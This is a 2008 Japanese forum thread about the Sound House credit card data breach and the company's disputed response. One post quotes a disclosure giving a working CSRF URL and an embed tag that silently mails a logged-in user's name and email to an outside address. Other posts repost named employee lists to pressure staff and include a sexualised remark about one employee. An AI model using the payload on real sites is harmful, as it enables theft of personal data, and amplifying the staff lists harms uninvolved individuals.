86名刺は切らしておりまして:2008/04/13(日) 18:27:12 ID:HRE80b0C
>>84
セキュリティ上考えられないような、システム設計しておいて、
被害者づらされてもなぁ。
87名刺は切らしておりまして:2008/04/13(日) 18:36:54 ID:KmIbx2pQ
>>84
社員が会社のパソコンを家に持って帰ってるのに被害者づらされてもなぁ
88名刺は切らしておりまして:2008/04/13(日) 21:28:28 ID:Utj4yaEV
http://www.furniturehouse.co.jp/staff/staff.asp
http://www.soundhouse.co.jp/staff/staff.asp

http://www.furniturehouse.co.jp/staff/images/tomomi.jpg
高木たんエロバージョン

http://www.soundhouse.co.jp/staff/img/tomomi.jpg
高木たんガッカリバージョン(差し換え後)

関連会社の個人情報も漏洩しているじゃん。
システム一緒。
89名刺は切らしておりまして:2008/04/14(月) 00:35:54 ID:7d83kHq3
http://www.furniturehouse.co.jp/staff/images/tomomi.jpg
>高木たんエロバージョン

http://www.soundhouse.co.jp/staff/img/tomomi.jpg
>高木たんガッカリバージョン(差し換え後)



どっちも同じ画像なんですが
90今後、被害拡大にご注意下さい ! :2008/04/14(月) 07:42:26 ID:78g6bkLt
「流出した情報の個人特定性の高さ」
「クレジットカード不正使用実被害発生」
「社内外発覚後の虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応」
「株式会社サウンドハウスの過去、現在の会社体質」
「サウンドハウス掲示板の不正操作」
「サウンドハウスニュースの責任転嫁、本質的謝罪の不在」

過去、クレジットカードご利用の皆様は、不正使用実被害発生の有無に関わらず、
再発行の手続きをされる事を、お勧め致します。

過去、個人情報登録者様、サウンドハウスへの連絡、メール等証拠保存、
個人情報流出被害による、詐欺等の被害に注意して下さい。

サウンドハウス発表個人情報流出内容
・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)

= = = = =
株式会社サウンドハウス
代表取締役社長 中島尚彦 氏
http://www.naritacity.com/
= = = = =
91名刺は切らしておりまして:2008/04/14(月) 07:53:58 ID:3LuJ+vwg
ここの会社はもともと客対応最悪だからな
いつか何かやらかすと思ってたよ

顧客情報を別サーバーで暗号化して管理してさえいれば
例え外部から不正アクセスされても情報流出はなかっただろう

92サウンドハウス様見解一部抜粋:2008/04/14(月) 18:30:08 ID:78g6bkLt
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

対応について 2008/04/14 15:44:32 サウンドハウス
・「弊社が「適切な安全管理措置を講じていた、とは間違っても言えません」、ということですが、弊社の認識は異なります」
・「同様の事故が他社でも起きている可能性も考えられ」
・「過去に例がない手法との調査報告もあり」
・「防ぐことが極端に難しかったことが考えられます」
・「近日中に予定しておりますプレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくこと」
・「その内容たるもの、当初は想定もしてなかった展開があり」

フリーダイヤル 2008/04/14 10:35:54 サウンドハウス
・「対象となるお客様の数が6桁を超え」
・「フリーダイヤルを導入することにより、イタズラや冷やかしの電話が増え」
・「フリーダイヤルひとつのサービスを考慮するよりも」
・「フェアであり、有益なサービスを、総合的に考えた上で提供する方が良いという結論」

不適切な発言多数につき、他省略させて頂きます。
93名刺は切らしておりまして:2008/04/14(月) 19:00:32 ID:x6WQpKOx
>>91
商品がキャベツ太郎の段ボールで来るしな
一回代引きで買った
94名刺は切らしておりまして:2008/04/14(月) 19:05:41 ID:I2UhxVgL
>>93
キャベツ太郎をか
95名刺は切らしておりまして:2008/04/14(月) 22:38:36 ID:zVsDwGAs
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
 ・登録内容の送信はSSLによって暗号化されており、安心してご利用いただけます。
 ・個人情報の管理には万全の体制を取っており、外部に漏れる事はございません。
 ・会員登録で得られる情報については、弊社の営業活動にのみ使用します。登録情報の外部への譲渡/販売は一切行いません。
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
96代表取締役社長 中島尚彦 氏:2008/04/15(火) 07:22:45 ID:55gPchps
株式会社サウンドハウス
代表取締役社長 中島尚彦 氏
http://www.naritacity.com/

「流出した情報の個人特定性の高さ」
「クレジットカード不正使用実被害発生」
「社内外発覚後の虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応」
「株式会社サウンドハウスの過去、現在の会社体質」
「サウンドハウス掲示板の不正操作」
「サウンドハウスニュースの責任転嫁、本質的謝罪の不在」

過去、クレジットカードご利用の皆様は、不正使用実被害発生の有無に関わらず、
再発行の手続きをされる事を、お勧め致します。
過去、個人情報登録者様、サウンドハウスへの連絡、メール等証拠保存、
個人情報流出被害による、詐欺等の被害に注意して下さい。

サウンドハウス発表個人情報流出内容
・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)
97「対象となるお客様の数が6桁を超え」:2008/04/15(火) 07:35:53 ID:55gPchps
サウンドハウス掲示板
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

対応について 2008/04/14 15:44:32 サウンドハウス
・「弊社が「適切な安全管理措置を講じていた、とは間違っても言えません」、ということですが、弊社の認識は異なります」
・「同様の事故が他社でも起きている可能性も考えられ」
・「過去に例がない手法との調査報告もあり」
・「防ぐことが極端に難しかったことが考えられます」
・「近日中に予定しておりますプレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくこと」
・「その内容たるもの、当初は想定もしてなかった展開があり」

フリーダイヤル 2008/04/14 10:35:54 サウンドハウス
・「対象となるお客様の数が6桁を超え」
・「フリーダイヤルを導入することにより、イタズラや冷やかしの電話が増え」
・「フリーダイヤルひとつのサービスを考慮するよりも」
・「フェアであり、有益なサービスを、総合的に考えた上で提供する方が良いという結論」

不適切な発言多数につき、他省略させて頂きます。
98個人情報流出内容:2008/04/16(水) 01:25:30 ID:XcmP/ACC
株式会社サウンドハウス
代表取締役社長 中島尚彦 氏
http://www.naritacity.com/

「流出した情報の個人特定性の高さ」
「クレジットカード不正使用実被害発生」
「社内外発覚後の虚偽、報告義務の隠蔽による、被害の拡大、誠意無き対応」
「株式会社サウンドハウスの過去、現在の会社体質」
「サウンドハウス掲示板の不正操作」
「サウンドハウスニュースの責任転嫁、本質的謝罪の不在」

過去、クレジットカードご利用の皆様は、不正使用実被害発生の有無に関わらず、
再発行の手続きをされる事を、お勧め致します。
過去、個人情報登録者様、サウンドハウスへの連絡、メール等証拠保存、
個人情報流出被害による、詐欺等の被害に注意して下さい。

サウンドハウス発表個人情報流出内容
・お名前
・フリガナ
・性別
・生年月日
・サウンドハウスサイト ログイン用メールアドレス
・サウンドハウスサイト ログイン用パスワード
・クレジットカード情報(会社名・カード番号・有効期限・ご名義)
99対応について:2008/04/16(水) 01:28:28 ID:XcmP/ACC
サウンドハウス掲示板
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

対応について 2008/04/14 15:44:32 サウンドハウス
・「弊社が「適切な安全管理措置を講じていた、とは間違っても言えません」、ということですが、弊社の認識は異なります」
・「同様の事故が他社でも起きている可能性も考えられ」
・「過去に例がない手法との調査報告もあり」
・「防ぐことが極端に難しかったことが考えられます」
・「近日中に予定しておりますプレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくこと」
・「その内容たるもの、当初は想定もしてなかった展開があり」

フリーダイヤル 2008/04/14 10:35:54 サウンドハウス
・「対象となるお客様の数が6桁を超え」
・「フリーダイヤルを導入することにより、イタズラや冷やかしの電話が増え」
・「フリーダイヤルひとつのサービスを考慮するよりも」
・「フェアであり、有益なサービスを、総合的に考えた上で提供する方が良いという結論」

不適切な発言多数につき、他省略させて頂きます。
100名刺は切らしておりまして:2008/04/17(木) 09:46:49 ID:y4a+s2Qe
お詫びメールが迷惑メールではじかれてたorz

ここ見て今知ったんだが大丈夫なのか・・・・

もうクレジット情報はサーバーから削除したって事だけど
ここって会員登録するときにカード情報登録したっけ?
それともカードで購入する時に登録?

後者だったら振込みでしか買った事ないから安心だけど
前者だったらカード止めなきゃな・・・
101ジャスティス:2008/04/17(木) 22:07:42 ID:EEvvcwuR
犯罪者よりひどい一部購入者
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm
「ゆすりたかりの類」
「被害者づらする前に、自己責任をとっていたのだろうか?」
「うるさいハエ」
「うじゃうじゃ小魚の様に理屈や文句をいって」
http://www.itmedia.co.jp/news/articles/0804/07/news006.html
どんだけ脆弱なサイトなのかとチェックしていたら、メールアドレスと氏名が流出する可能性があることに気づいた。
サウンドハウスの「お友達に勧める」機能。
これを悪用すれば以前話題になったAmazonの「お友だちに知らせる」機能と同じようなことが起こるのでは。
方法
サウンドハウスにログインしている状態で以下のURLを踏むと、「ToAddr=」宛に自分の氏名・メールアドレスが送信される。
http://www.soundhouse.co.jp/shop/[email protected]&Message=test&x=87&y=13&Item=1230%5E578603&Message1=

このURLを踏まなければ問題ないように思えるが、embed要素で悪意のあるサイトに埋め込んだら?
<embed src="http://www.soundhouse.co.jp/shop/[email protected]&Message=test&x=87&y=13&Item=1230%5E578603&Message1=" width="88" height="31">
試しにHTMLに埋め込んで表示してみると。こんなメールが届いた。

件名:○○○○ 様から、お勧めメールが届いています
差出人:メールアドレス
本文:
test
ご案内致しました内容につきまして不明な点がございましたら、
弊社営業までご連絡頂きますようお願い致します。

”WEBシステム構成の再設計”を実行したらしいけど、どうも信用できないよサウンドハウス。
サウンドハウスのサイトを閉じる前には必ずログアウトを行うこと。

ちなみにembed要素はFirefoxにも対応してますよ。
プラグインの追加が表示されますが、バックグラウンドではsrc属性が展開されています。。。
103名刺は切らしておりまして:2008/04/18(金) 12:25:10 ID:D2z6RYEp
オイ、PDFがうpされてるぞ
増して呆れる内容だが
104名刺は切らしておりまして:2008/04/18(金) 13:45:36 ID:RxhrHqa9
105名刺は切らしておりまして:2008/04/18(金) 14:26:45 ID:wzl/EQUy
いままでの対応への評価

・クレジットカード会社各社  ・・・  〇
多少の混乱などあったものの最終的にはまぁまぁではないだろうか
しかしながら、クレジットカードの仕組みを考えればこの程度は対応できて当然
今回対応うまくやったところはユーザの信頼も+になったはず。

・第三者機関(ラック)  ・・・ △
ユーザ視点にたった対応の提案をしましょう
安全かどうか調査中のシステムを動かしたままにしておくとか
定石からもはずれている。名前はうれてるがこんなもんなの?
正直、失望したといわざるを得ない。
ただし、決定権はやはりサウンドハウスであることだけは考慮の余地あり

・ハッカーセーフ  ・・・  ×
ハッカーセーフ(笑)

・システム開発元(サウンドハウス) ・・・ ×
セキュリティホールを放置し盗まれた事より、事後の対応の悪さが酷い。
事態が発生した後にシステム停止する方向で経営層に提言すべきはここ。
また、システムに疎い経営層と違い影響範囲や2次被害など想定できるはず。

・サウンドハウス  ・・・  狂気
あらゆる対応において判断を誤っており
商魂のたくましさは驚嘆に値するが、恥しらずとはまさにこのこと。
今回発信されたPDFに関しては正気とは思えない。

もちろん、いままでも正気とはおもえなかったが、無知によるものだとも思えた、
だからこそ第三者機関やシステム開発元(部署)の対応の悪さも目に付いた。
しかし、PDFを読む限り最たる原因は経営者の頭がおかしい事だろう。

106名刺は切らしておりまして:2008/04/18(金) 14:33:51 ID:f3yzGeVi
被害者です。

で何かお詫びとして「1,000円相当のクレジット」のうんぬんのメールが来たから、
すかさず、いつ、どうやって1000円くれるのか?みたいなメール送ったら、
↓こんな回答が今来たよ〜ん。

-------------

お客様各位

この度、メールにてお送りした「1,000円相当のクレジット」のご案内について、補
足説明をさせていただきます。

当初、「1,000円相当のクレジットをお客様の弊社ご登録口座に進呈させて頂きま
す。」とご案内いたしましたが、こちらはサウンドハウスでのお買い物代金に充当さ
せて頂く形になります。これは1,000円相当のお預かり金と同様の扱いになり、実際
には、次回ご購入時に1,000円分の割引が適用されるという意味になります。すでに
サウンドハウス会員情報に反映されておりますので4月18日よりご利用いただくこと
が可能です。このクレジットは2009年4月末まで有効となります 。

この度は大変ご迷惑をおかけ致しました。
今後ともよろしくお願い致します。

-------------

次買ったら。1000円値引きしますだって(笑)
買うわけね〜だろが、こんな糞店で普通。

以上、報告でした。
107名刺は切らしておりまして:2008/04/18(金) 14:42:52 ID:MG/ebWzA
個人情報がらみはしょうもないのまでニュースになるのに
これのニュースは見てないような。クレカの番号が漏れたなんて
大問題なのに、何でニュースにならないの?
108名刺は切らしておりまして:2008/04/18(金) 14:51:32 ID:D2z6RYEp
恐らくあまりの被害の大きさに、パニックになるのをクレカ会社が察知し、
報道規制敷いてると思われ。
PDFを読む限り胡散臭いやりとりが多い。
109名刺は切らしておりまして:2008/04/18(金) 15:07:31 ID:wDJcw/Ki
>>104
このファイル改変どころか印刷もロックしてる。
よっぽど今回の件が応えたんだな。
110名刺は切らしておりまして:2008/04/18(金) 15:14:39 ID:bb11YtFQ
>>109
いや、印刷はできるぞ
できたからと言ってどうというわけでもないが
111名刺は切らしておりまして:2008/04/18(金) 15:24:44 ID:f3yzGeVi
106の被害者です。

>>107

いや、NHKで一回だけニュース見たよ。
後、楽天のカード使ったんだけど、流出の次の日即効連絡あって
半強制的にカード停止→再発行された。
その時、楽天でもプレスリリースするって言ってたけど、
してないね。
http://www.rakuten.co.jp/help/whatsnew/
112名刺は切らしておりまして:2008/04/18(金) 16:50:23 ID:lh5+JXDS
全国の消費生活センター
http://www.kokusen.go.jp/map/
個人情報に関する苦情相談窓口
http://www.kokusen.go.jp/map_kojin/index.html
消費者トラブルメール箱
http://www.kokusen.go.jp/t_box/t_box.html

> * 電子メールによる相談の受け付けは行っていません。(一部の消費生活センターを除く)
> * ご相談は、お電話または文書(郵便)でお願いします。
> * 相談日や相談時間を事前にご確認の上、直接訪問されても結構です。

  文章にまとめて送る方がスムーズに話が伝わると思うよ。
113名刺は切らしておりまして:2008/04/18(金) 16:55:02 ID:3/V6k9Mr
http://www.itmedia.co.jp/news/articles/0804/18/news085.html
カード情報流出の経緯を分刻みで説明 サウンドハウス、1人1000円分のポイント付与
不正アクセスで顧客のクレジットカード情報など流出したサウンドハウスは、補償として
1人当たり1000円分のポイントを支払うと発表した。A4用紙22枚にわたり、
経緯を分刻みで詳細に説明している。
2008年04月18日 16時14分 更新
114名刺は切らしておりまして:2008/04/18(金) 17:04:31 ID:4H7L5Ad4
あぶねえ・・・amazonで買う選択をしといて良かった
115名刺は切らしておりまして:2008/04/18(金) 17:07:25 ID:a+z6abLA
1000円安くされても、ここで会社で使う音響機器を買ったばかりに
全社掲示板に事故報告された俺の傷は癒えない
116名刺は切らしておりまして:2008/04/18(金) 23:55:55 ID:4lY3di3i
金輪際サウンドハウスで買わない約束をするから現金か汎用的な金券、図書券などで下さいw
117名刺は切らしておりまして:2008/04/19(土) 01:20:43 ID:eoEzDC30
>>105
>・第三者機関(ラック)  ・・・ △
>ユーザ視点にたった対応の提案をしましょう
>安全かどうか調査中のシステムを動かしたままにしておくとか
>定石からもはずれている。名前はうれてるがこんなもんなの?

LACは当然、そういう提案はしたんじゃないの?
そういう提案を拒否して営業続ける権限はサウンドハウスにあるわけで。

そのPDFじゃ都合の悪いことは書かないようにしている可能性は大きいよね。
「LACからサーバ停止の提案があったがお断りした」
なんて書けるわけがないわけで。
118名刺は切らしておりまして:2008/04/19(土) 08:36:42 ID:9WMtucor
自分も被害者としてこのスレに注目してます。しかしニューススレって数日で落ちてしまう。
他にもスレありますか?
119名刺は切らしておりまして:2008/04/19(土) 09:24:10 ID:af7G6qAt
120名刺は切らしておりまして:2008/04/19(土) 11:59:23 ID:VjBIfU0p
>>118
知っている&生きているものだけ

【緊急】サウンドハウスがクレジットカード情報流出
http://bubble6.2ch.net/test/read.cgi/wm/1207219510/l50
[9万人]サウンドハウス問題被害者の会[最大被害]
http://life9.2ch.net/test/read.cgi/credit/1207826606/l50
【緊急】サウンドハウスがクレジットカード情報流出
http://music8.2ch.net/test/read.cgi/dj/1207219118/l50
【中国】サウンドハウス 個人情報の流出【音家】
http://music8.2ch.net/test/read.cgi/karaok/1207235950/l50
【ネット/通販】サウンドハウス、外部からの不正アクセスにより利用者の情報が流出[08/04/04]
http://news24.2ch.net/test/read.cgi/bizplus/1207486123/l50
【ネット】サウンドハウスの個人情報流出は最大9万7500件〜SQLインジェクション攻撃、発信源はすべて中国[04/07]
http://news24.2ch.net/test/read.cgi/news4plus/1207554954/l50
【音屋】サウンドハウス Part4【個人情報流出】
http://pc11.2ch.net/test/read.cgi/dtm/1207573513/l50
121名刺は切らしておりまして:2008/04/19(土) 12:58:05 ID:d2VWBb1+
122名刺は切らしておりまして:2008/04/19(土) 14:32:57 ID:VjBIfU0p
>>120
AV機器版にあったので追加

【緊急】サウンドハウスがクレジットカード情報流出
http://hobby11.2ch.net/test/read.cgi/av/1207219465/l50
123代表取締役社長「中島 尚彦」:2008/04/19(土) 16:28:11 ID:UUmTSWUU
株式会社サウンドハウス
代表取締役社長「中島 尚彦」
http://www.soundhouse.co.jp/staff/staff.asp

データ管理グループ
・Data Management Administrator
「渡辺 篤史」
・Data Management
「下嶋 正浩」「小川 泰晃」「楊枝 佑介」
ネットグループ
・System Director「中村 裕明」
・System Engineer「四津谷 尚」
・System Support「佐藤 健」「滑川 茂」「宮尾 和興」「大野」
・Web Support「木 知己」「及川 謙一」「マイルス」
営業グループ
・Sales Manager「加茂 尚広」「安倍 秀明」
・Sales「田島 明美」「鈴木 康太郎」「山田 真也」「村尾 善子」「木川 智史」「高木 美枝子」「増田 和枝」「大川原 妙子」「宮應 慶太」
「平間 啓介」「勝田 誠」「宗野 利哉」「土井 大輔」「望月 了輔」「坂寄 秀樹」「竹内 雄二」「鈴木 健」「橋本 孔爾」
技術サポートグループ
・Technical Director「宮野 浩一」「福田 泰秀」
・Technical Service「牧野 吉宏」「波多野 太郎」「津村 郁」「幸良 信也」「西廣 聡」
・MI Support Manager「岩本 敏彦」
・MI Support「本田 卓」
・Customer Support「小和田 嘉晶」「村上 剛」「湯澤 功二」
124代表取締役社長「中島 尚彦」:2008/04/19(土) 16:31:51 ID:UUmTSWUU
株式会社サウンドハウス
代表取締役社長「中島 尚彦」
http://www.soundhouse.co.jp/staff/staff.asp

物流グループ
・Warehouse Manager「伊能 宏晃」
・Warehouse Assist Manager「高橋 実」
・Warehouse Assistant「竹内 義明」「前波 行則」「井 義典」「三吉 朋和」「篠原 恵子」「植園 秀行」「三ツ木 健太郎」「三見 正人」
「小曵 正人」「大塚 哲」「高橋 正和」「大竹 達郎」「稲葉 英明」「八木 拓也」「小川 忠和」「置塩 正太」「黒多 理信」「新宅 友和」
「長谷部 浩文」「小野 光治」「松田 昂」「内田 和之」「中西 洋希」「相京 達也」「籾井 辰夫」「明智 和彦」
総務グループ
・Office Administrator「遠田 歩」「堀越 江美」「正垣 麻子」「長谷川 悦子」
経理グループ
・Accounting「吉岡 一祥」「中川 正人」「堺 友子」「大塚 友美」「高田 基博」
商品グループ
・Product Sales Manager「桜井 正俊」
・Product Sales「佐藤 康男」「松野 豊」「渕上 知洋」
125株式会社サウンドハウス社員様へ:2008/04/19(土) 16:52:02 ID:UUmTSWUU
株式会社サウンドハウス社員の皆様は、ご自分の個人情報が、
代表取締役社長「中島 尚彦」のプレスリリース内容、
1,000円で「・お名前・フリガナ・性別・生年月日・メールアドレス・パスワード・クレジットカード情報(会社名・カード番号・有効期限・ご名義)」に同意され、
社員として所属、給与を受け取られる続けられると、解釈されます。
誠意無き間違った対応に、異議が無く、同意同調、顧客に対する全社員の見解対応と理解しました。

「弊社が「適切な安全管理措置を講じていた、とは間違っても言えません」、ということですが、弊社の認識は異なります」
「プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております」
126名刺は切らしておりまして:2008/04/19(土) 17:10:47 ID:oPGhj4d5
>>120
まだあったよ。

【緊急】サウンドハウスがクレジットカード情報流出
http://food8.2ch.net/test/read.cgi/curry/1207221388/
127名刺は切らしておりまして:2008/04/19(土) 17:12:42 ID:2iItw5eu
ここは最悪だわ。
128名刺は切らしておりまして:2008/04/19(土) 18:17:23 ID:br+10x9f
「サウンドハウス個人情報流出被害者の会」
http://soundhousejiko.wiki.fc2.com/

どんどん更新してください。
129名刺は切らしておりまして:2008/04/19(土) 19:34:48 ID:br+10x9f
↑のwiki.fc2.comはちょっと使い勝手が悪いのかうまいこと操作できないので
言いだしっぺでしたが、また場所移して作り直しますね m(_ _)m
130名刺は切らしておりまして:2008/04/19(土) 20:05:05 ID:hLHYLU+D
中国人による犯罪か。
131大切な「出来るだけ」の誠意:2008/04/20(日) 00:55:35 ID:mS2zjP2G
過去、不祥事を起こされた会社組織、人間は誠意有る対応で、信用回復に努めてまいりました。
それを怠った会社組織、人間は淘汰、軽蔑されてまいりました。
(あくまでも参考としてですが、ジャパネットなどは出来るだけの誠意は伝えた様に感じます)

今回、これだけの実被害をあたえたにもかかわらず、被害者への誠意が感じられない。
被害者の感情を逆撫でする、発言を繰り返した株式会社サウンドハウス。
誠意なき対応により、株式会社サウンドハウスの発表の信憑性を己で地に落としています。
今回の個人情報流出で、悲惨な事件等に巻き込まれる事も、想定外と安心出来ません。

求められたのは、「出来るだけ」の誠意ではないでしょうか。
「今回、ご迷惑をおかけしましたが、技術的、人員的、財政的に、
"この様な状態"で、"この様な対応"しか出来ない事をご理解下さい」
無理難題では無く、出来るだけの誠意を表す事が、欠落した会社組織、経営者である事は明白です。

・対顧客に関しては、株式会社サウンドハウスが加害者として成立を他関連へ全責任転嫁。
・顧客の被害を他人事の様に、自社以外へ全責任転嫁。
・率先して大量の中国製品を販売されているのに、他国家、他人種へ全責任転嫁。
・カード会社各社への侮辱的全責任転嫁。

「弊社が「適切な安全管理措置を講じていた、とは間違っても言えません」、ということですが、弊社の認識は異なります」
「プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております」
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

プレスリリース = ブログ「ハッカー戦略と、その背景」「サイバー社会への警告」「総論」etc ...
カード会社各社承諾のプレスリリース内容と、中島尚彦氏は記されています。
http://www.soundhouse.co.jp/news/20080418.pdf

一刻も早い、誠意ある対応で、会社組織、人間として、再建を目指して頂きたいです。
132名刺は切らしておりまして:2008/04/20(日) 13:36:37 ID:xeIGf2eh
では、損害賠償額算出式'03 を宇治市の事例に適用してみましょう。
漏洩した個人情報は、「住民番号、住所、氏名、性別、生年月日、転入日、転出先、世帯主名、世帯主との続柄等」なので、
精神的苦痛・経済的損失ともにレベル1です。
500 × 2 × 6 × 2 × 1 = 12,000 (ポイント)
すなわち、漏洩情報1件につき 1 万 5,000 円の賠償額が想定されます。
実際、判決では1人当たり 1 万 5,000 円の慰謝料を命じていますから、だいたい当たっているというところでしょうか。

また、Yahoo!BB(BB テクノロジー)の会員情報漏洩事件では、2006 年 5 月 19 日、大阪地裁が 1 人当たり 6,000 円
(慰謝料 5,000 円、弁護士費用1,000 円)の支払いを命じました。
漏洩情報などは宇治市の事例と同等の内容ですが、判決文からは社会的責任度を1ポイントと見なしているようで
(BB テクノロジーは情報通信業のはずですが)、損害賠償額算出式'03 に当てはめると
500 × 2 × 6 × 1 × 1 = 6,000 (ポイント)
漏洩情報 1 件につき 6,000 円の賠償額となり、判決と等価です。
なお、2007 年 6 月の第二審(大阪高裁)判決では 1 人当たり 5,500 円(慰謝料 5,000 円、弁護士費用1,000 円)に減額されました。
減額の理由は、損害額自体を低く見積もったわけではなく、事件直後、会員に 500 円の郵便振替支払通知書を郵送したことをもって、賠償の一部弁済として控除したのです。
2007 年 12 月 14 日、最高裁はヤフーの上告を退け、賠償が確定しました。

最後に TBC の事例です。
氏名、住所に加え、スリーサイズなどの身体情報が漏洩しているので、精神的苦痛はレベル2になります。これを 損害賠償額算出式'03 に当てはめると
500 × 11 × 6 × 1 × 1 = 33,000 (ポイント)
漏洩情報 1 件につき 3 万 3 千円の賠償額となり、またしても判決の 3 万 5 千円の近い数字です。

以上の結果から、損害賠償額算出式'03 は賠償額の目安として利用できると考えられます。
http://www.pahoo.org/e-soul/privacy/atwork/atwork-019-03.shtm)
133名刺は切らしておりまして:2008/04/20(日) 20:39:09 ID:pUMGJL1G
>>102
> サウンドハウスのサイトを閉じる前には必ずログアウトを行うこと。

サイトにアクセスしてないし、アカウントも持ってないからわからんけど、
ログアウト処理が糞だと、その「ログアウト機能」を使っても無意味な場合があるよ。
まぁ、使わないのが最良解じゃないかな?
134経済産業省:2008/04/21(月) 20:20:45 ID:daX3yeTK
今週、「株式会社サウンドハウス」経済産業省より呼び出しあり。
135名刺は切らしておりまして:2008/04/21(月) 21:25:49 ID:i0rCB8CG
>お客様からは、「サウンドハウスの個人情報管理が甘かったのではないか」という管理責
任を問う声を頂きました。当然ながら、流出が起きた時点で、どのような対策を講じてい
たかが問われます。それに対して弊社の率直な答えは、通常、企業が取るべき対策は取っ
ており、完璧ではないが、落ち度があったと言えるレベルでもない、ということです。こ
れは言い訳ではなく、ありのままの気持ちを述べております。以下にその根拠を述べます。
 警察庁が平成20年2月に発表した平成19陣度の報告文書によると(中略)
国内全般にセキュリティ対策への関心がまだ、足りないことがデータで実証された例です。


>これは言い訳ではなく、ありのままの気持ちを述べております。以下にその根拠を述べます。
ttp://www.soundhouse.co.jp/news/20080418.pdf
136名刺は切らしておりまして:2008/04/21(月) 21:31:33 ID:i0rCB8CG
>この点が実は一番の問題であったと考えております。
例をあげれば、その結果ファイアーウォールによるアクセス制限が甘くなり、
弊社のシステム開発を行うスタッフとデータのやり取りを日々実行している内に、
拠点のグローバルIPアドレスに対して、
SQLサービスのアクセスがインターネットを介して可能な状態になっていました。
この点につきましては、大変反省をしております。
137名刺は切らしておりまして:2008/04/21(月) 21:37:45 ID:AykKDgIm
だが俺は悪くない。 by rick
138名刺は切らしておりまして:2008/04/21(月) 23:36:08 ID:nP8eZC4e
報告書の中にクレジット会社への悪口を書くのが信じられん
139名刺は切らしておりまして:2008/04/22(火) 00:08:49 ID:65+v8BIs
だが、クレジット会社も、第三者機関も叩き あげく、政府が悪い!!
140名刺は切らしておりまして:2008/04/22(火) 02:26:57 ID:/OOCYGJx
>>135

あの、私も被害者なのですが、本当にそんな事言ってる(書いてある)んですか?
そのpdfすら怖くて開けません。。特に遺憾なのは、

>完璧ではないが、落ち度があったと言えるレベルでもない

現に私のカードは停止→再発行と約半月のブランクが生まれ、
各カード登録の情報を書き換えたりとかなりの労力を使いました。
なにより精神的にかなり疲れました。

落ち度があったと言えるレベルでもない=落ち度は無い

と言う言い分ですよね?何か1000円分の次回購入時に使えるポイント?
みたいなメールが来てましたが、まだ私のアドレスがこの会社にあると思うと
不安でしょうがないです。
141名刺は切らしておりまして:2008/04/22(火) 06:27:53 ID:gA6VckO7
>>140
俺もこの半月疲れたよ。
まだ新しいカード来ないし。

そのメールが着たってことはまだ登録削除してないのか。
削除するとメール来なくなるよ。
データは残るらしいけど、登録削除した客は今後購入が見込めないから無視。
そのまんまの客はまだまだ搾り取れる、と思われてるだけ。
サウンドハウスで買う以外に価値の無い1000円のために
またさらに個人情報を危険に晒すのは愚。
さっさと手を切ったほうがいい。
142思想発言カルト危惧:2008/04/22(火) 06:57:08 ID:X2GLOxH3
株式会社サウンドハウス 様
代表取締役社長「中島 尚彦」様、従業員各位 様、発表、公式プレスリリース。
 http://www.soundhouse.co.jp/staff/staff.asp
 http://www.soundhouse.co.jp/news/20080418.pdf

・謝罪無き「弊社が「適切な安全管理措置を講じていた、とは間違っても言えません」、ということですが、弊社の認識は異なります」 
・お客さまの情報を預かる事で生じる責任を、他者へ全責任転嫁。
・中国製品を率先して販売、利益を得ている、株式会社サウンドハウス様の中国、中国人犯罪者への全責任転嫁。 
・被害拡大、発表の遅れに関する責任は、カード会社各社様による指示と株式会社サウンドハウス様は断言。 
・責任の重大過失の聴衆の為、今週「株式会社サウンドハウス」経済産業省へ出頭。  

現在も電話番号により、過去に遡って個人情報を利用している、株式会社サウンドハウス様の発表の信憑性。
「お名前」「フリガナ」「性別」「生年月日「弊社サイト ログイン用メールアドレス」「弊社サイト ログイン用パスワード」
「クレジットカード情報(会社名・カード番号・有効期限・ご名義)」
「個人情報流出の可能性がある122,884名」
「実際の個人情報流出対象のお客様は、延べ人数で97,500名」等々..... 

「プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております」 
今回、被害に遭われた皆様は、如何お決めになられましたか ?
謝罪責任を放棄された、個人情報流出は極めて危険、悪質な被害をもたらしています。 
今後、集団的な訴訟、謝罪請求が行われると考えられますので、ご協力もご参加下さい。 

他、サイト比較、不自然な、擁護。
 http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

代表取締役社長 中島尚彦様の、「宗教」「政治」等、思想発言のカルト危惧。 
143個人情報流出:2008/04/22(火) 07:34:08 ID:X2GLOxH3
株式会社サウンドハウス 様
代表取締役社長「中島 尚彦」様、従業員各位 様、発表、公式プレスリリース。
 http://www.soundhouse.co.jp/staff/staff.asp
 http://www.soundhouse.co.jp/news/20080418.pdf

「プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております」 
今回、被害に遭われた皆様は、如何お決めになられましたか ?
144カード各社プレスリリース一部:2008/04/22(火) 08:26:56 ID:X2GLOxH3
145135:2008/04/22(火) 10:53:29 ID:poAmd+va
>>140本当です。
146名刺は切らしておりまして:2008/04/22(火) 14:20:32 ID:w6ojGGYy
本音が書かれてあってなかなか面白い
147名刺は切らしておりまして:2008/04/22(火) 16:38:05 ID:0IrUe4Ok
